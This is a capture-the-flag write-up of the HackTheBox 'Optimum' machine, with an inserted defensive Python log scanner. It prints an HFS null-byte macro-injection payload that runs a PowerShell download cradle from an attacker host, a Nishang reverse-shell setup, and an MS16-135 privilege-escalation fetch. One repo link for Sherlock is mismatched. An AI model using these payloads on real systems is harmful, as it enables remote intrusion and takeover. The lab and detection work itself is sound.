HackTheBox — Optimum

Shellbr3ak
Feb 24, 2020


Hey guys, what’s going on? This is Shellbreak, and we’ll be doing Optimum from HackTheBox, which is rated as easy.

The idea of the box is an HTTP File Server (HFS) with an RCE vulnerability that we’ll use to get a shell on the box. Once we have a shell, for the privesc we’ll use a PowerShell script called Sherlock.ps1 to enumerate the box locally and get a root shell.

So, enough talking and let’s jump in.

As always, we’ll start with an nmap scan:

nmap -sC -sV -oA nmap/optimum 10.10.10.8

As you can see, we have one port open, 80, and its banner tells us that it’s HttpFileServer version 2.3.

After googling around, I found that this server has an RCE vulnerability; check this URL to read more about it:

https://www.kb.cert.org/vuls/id/251276/

Web Enumeration:

http://10.10.10.8

The idea of the vulnerability is that the search feature in the app fails to handle null bytes.

The input to the search feature is filtered with a regex, so using a null byte we can terminate the regex string and then insert the command we want.

While googling for CVEs, I saw that the server has its own scripting language (HFS scripting), which we’ll use to execute our commands on the box.
See this page if you’d like an idea of what the scripting language looks like:

https://webcache.googleusercontent.com/search?q=cache:JhOwBxwMYqYJ:https://www.rejetto.com/wiki/index.php/HFS:_scripting_commands+&cd=1&hl=en&ct=clnk&gl=tr&client=firefox-b-d

We’ll be using the “exec” macro to execute commands:

{.exec|command.}
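From the defender’s side, the combination of a null byte and an HFS macro opener like {.exec| in a request is a clear signal in web or proxy logs. The following Python scanner is an added example and not part of the original write-up; the log lines are constructed for illustration and the field layout assumes Apache-style common log format.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines (not real traffic): a benign search, a benign
# filename that merely contains "exec", an HFS macro injection, and a lone null byte.
SAMPLE_LOG = [
    '10.10.14.5 - - [24/Feb/2020:10:01:02 +0000] "GET /?search=quarterly+report HTTP/1.1" 200 1532',
    '10.10.14.5 - - [24/Feb/2020:10:02:40 +0000] "GET /?search=exec_notes.txt HTTP/1.1" 200 812',
    '10.10.14.34 - - [24/Feb/2020:10:03:11 +0000] "GET /?search=%00{.exec|powershell.exe+IEX(New-Object+Net.WebClient).downloadString(%27http://10.10.14.34:8000/x.ps1%27).} HTTP/1.1" 200 0',
    '10.10.14.34 - - [24/Feb/2020:10:04:00 +0000] "POST /?search=%00hello HTTP/1.1" 200 0',
]

# Common log format: client, identd, user, [timestamp], "METHOD target PROTO"
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"'
)
# HFS macro syntax is {.name|args.}; capture the macro name for the finding.
MACRO_RE = re.compile(r'\{\.\s*([a-z_]+)\s*\|', re.I)
# Typical PowerShell download-cradle keywords seen in the same requests.
CRADLE_RE = re.compile(r'IEX|DownloadString|Invoke-Expression', re.I)


def classify_request(target):
    """Return (severity, reasons) for one request target; severity is None when clean."""
    decoded = unquote(target)  # %00 -> '\x00', %27 -> "'"
    reasons = []
    if '\x00' in decoded:
        reasons.append('null byte in request')
    macro = MACRO_RE.search(decoded)
    if macro:
        reasons.append('HFS macro {.%s|' % macro.group(1).lower())
    if CRADLE_RE.search(decoded):
        reasons.append('powershell download cradle')
    # A macro opener is the actual injection; a lone null byte is only worth a low-severity note.
    severity = 'high' if macro else ('low' if reasons else None)
    return severity, reasons


def scan_log(lines):
    """Parse each log line and collect findings for suspicious requests."""
    findings = []
    for line in lines:
        req = REQUEST_RE.match(line)
        if not req:
            continue  # skip lines that do not parse as a request
        severity, reasons = classify_request(req.group('target'))
        if severity:
            findings.append({'ip': req.group('ip'), 'ts': req.group('ts'),
                             'severity': severity, 'reasons': reasons})
    return findings
```

The decode step matters: matching on the raw URL-encoded line would miss %00, and a benign filename containing "exec" is not flagged because the macro opener {. is required.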

Exploitation:

Using Burp to intercept the request (after submitting our input in the search box):

Now, since the box is 64-bit, I’ll use the 64-bit PowerShell to upload my shell.

You can get the script I’ll be using from this GitHub repo:

https://github.com/samratashok/nishang

I’m going to use the Invoke-PowerShellTcp.ps1 script, but before that we have to edit the script to invoke the right function and add our IP address.

Copy this line and add it to the end of the script:

Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.34 -Port 1234

Note: run a Python simple HTTP server so the box can download the script.

The payload should look like this:

%00{.exec|c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadString('http://10.10.14.34:8000/Invoke-PowerShellTcp.ps1').}

Now in Burp:

Don’t forget to set up your netcat listener on port 1234.

And we got a user shell:

Now let’s upload the Sherlock script to enumerate the box and see if we get anything.

You can get the script from this repo:

https://github.com/sherlock-project/sherlock

Note: you need to invoke the function you want to run at the end of the Sherlock script (in my case it’s Find-AllVulns).

Now download the script onto the box:

And we can see that the server is vulnerable to MS16-135, so let’s get the exploit and see if it works.

Download the exploit from this URL:

https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS16-135/MS16-135.ps1

Now let’s download the script onto the box:

IEX(New-Object Net.WebClient).downloadString('http://10.10.14.34:8000/ms16-135.ps1')

And indeed we got root on the box.

So, this is how we own root on the Optimum box. I hope you guys enjoyed it, and I’ll see you all in the next write-up.

Shellbr3ak

Offensive Security Engineer | Threat Intelligence Analyst | Cloud/Web App Penetration Tester | CTIA | eWPTXv2 | OSWE | CTF Lover